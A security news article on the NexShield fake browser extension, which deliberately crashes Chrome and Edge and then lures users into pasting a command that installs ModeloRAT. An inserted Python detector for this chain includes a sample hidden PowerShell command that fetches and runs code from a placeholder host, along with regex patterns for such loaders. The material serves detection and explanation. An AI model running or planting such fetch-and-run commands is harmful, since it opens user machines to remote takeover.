Fake NexShield extension crashes Chrome and Edge to push ModeloRAT

A technical analysis by Huntress says a fake Chrome and Edge ad blocker called NexShield intentionally crashed browsers earlier this month by exhausting memory, causing frozen tabs and process hangs, and was used to deliver a Python remote access tool called ModeloRAT.

KEY FACTS

  • Incident: A fake ad blocker named NexShield caused real browser crashes to prompt further action
  • Technique: Infinite chrome.runtime port connections exhausted browser memory and CPU
  • Payload: ModeloRAT, a Python-based RAT, was deployed to domain-joined hosts
  • Mitigation: NexShield was removed from the Chrome Web Store and a full system cleanup is recommended

The extension creates an infinite loop of chrome.runtime port connections that exhaust browser memory. The outcome is frozen tabs, elevated CPU and RAM use in the browser process, and eventual hangs or crashes that often require termination via Task Manager.

When the browser is restarted, the extension displays a deceptive pop-up that urges a scan and opens a window with a fake warning. The interface copies a command to the clipboard and instructs the user to paste and run it in Command Prompt. That chain launches an obfuscated PowerShell script from a remote source, which downloads and executes additional code.
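A defender-side illustration of the chain just described, added here and not part of the Huntress analysis: a small detector that walks constructed process-creation records (shaped like Sysmon/EDR events) and flags PowerShell launched from an interactive Command Prompt with several download/obfuscation traits. The event data, the placeholder URLs and the indicator regexes are assumptions of this example, not strings taken from the actual campaign.

```python
import re

# Constructed process-creation events standing in for Sysmon/EDR records (not from the article).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    # ClickFix-style chain: user pastes a clipboard command into an interactive prompt,
    # which launches a hidden, policy-bypassing PowerShell that fetches and runs remote code
    {"pid": 200, "ppid": 100, "image": "cmd.exe", "cmdline": "\"C:\\Windows\\System32\\cmd.exe\""},
    {"pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c \"iex (iwr https://placeholder.invalid/s -UseBasicParsing)\""},
    # Benign: an admin runs a local script from a prompt opened via Explorer
    {"pid": 400, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 500, "ppid": 400, "image": "powershell.exe", "cmdline": "powershell -File C:\\scripts\\inventory.ps1"},
    # Non-interactive: a scheduled task downloads a package; same traits but a different parent chain
    {"pid": 600, "ppid": 1, "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": 700, "ppid": 600, "image": "powershell.exe",
     "cmdline": "powershell -ep bypass -c \"iwr https://updates.placeholder.invalid/pkg -OutFile C:\\Temp\\pkg\""},
]

# Generic heuristics for a user-pasted loader (assumed, not campaign-specific indicators).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl)\b|https?://", re.I),
    "in_memory_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
}


def find_clickfix_chains(events, min_indicators=2):
    """Return PowerShell processes whose ancestry is explorer.exe -> cmd.exe -> powershell.exe
    (an interactive prompt, as in a pasted ClickFix command) and whose command line shows at
    least `min_indicators` of the traits above. Requiring the interactive chain is what keeps
    the scheduled-task download (pid 700) out of the results."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = by_pid.get(e["ppid"])
        grandparent = by_pid.get(parent["ppid"]) if parent else None
        interactive = (parent is not None and parent["image"].lower() == "cmd.exe"
                       and grandparent is not None and grandparent["image"].lower() == "explorer.exe")
        if not interactive:
            continue
        matched = sorted(name for name, rx in INDICATORS.items() if rx.search(e["cmdline"]))
        if len(matched) >= min_indicators:
            hits.append({"pid": e["pid"],
                         "chain": [grandparent["image"], parent["image"], e["image"]],
                         "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_chains(SAMPLE_EVENTS):
        print(hit)
```

On real telemetry the parent chain would also need to account for conhost.exe and for PowerShell's own child processes; the point here is that the interactive-prompt ancestry, not the download alone, is the distinguishing feature of this delivery step.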

The payload delays execution by about 60 minutes after installation. On domain-joined hosts the campaign delivers ModeloRAT, which can collect reconnaissance data, execute PowerShell commands, modify the Registry, introduce further payloads, and update itself. On non-domain-joined hosts the command and control server returned a “TEST PAYLOAD!!!!” message instead.

Users should install extensions only from trusted publishers and avoid running external commands whose effect is not understood. Uninstalling NexShield does not remove all payloads, so affected systems should receive a full cleanup. The actor is tracked as ‘KongTuke’, and the campaign has been active since early 2025 with a move toward enterprise targets.

WHY IT MATTERS

Successful ClickFix-style attacks can deliver persistent remote access tools to corporate networks and enable post-compromise activity. Careful extension selection and never running unknown external commands reduce the risk.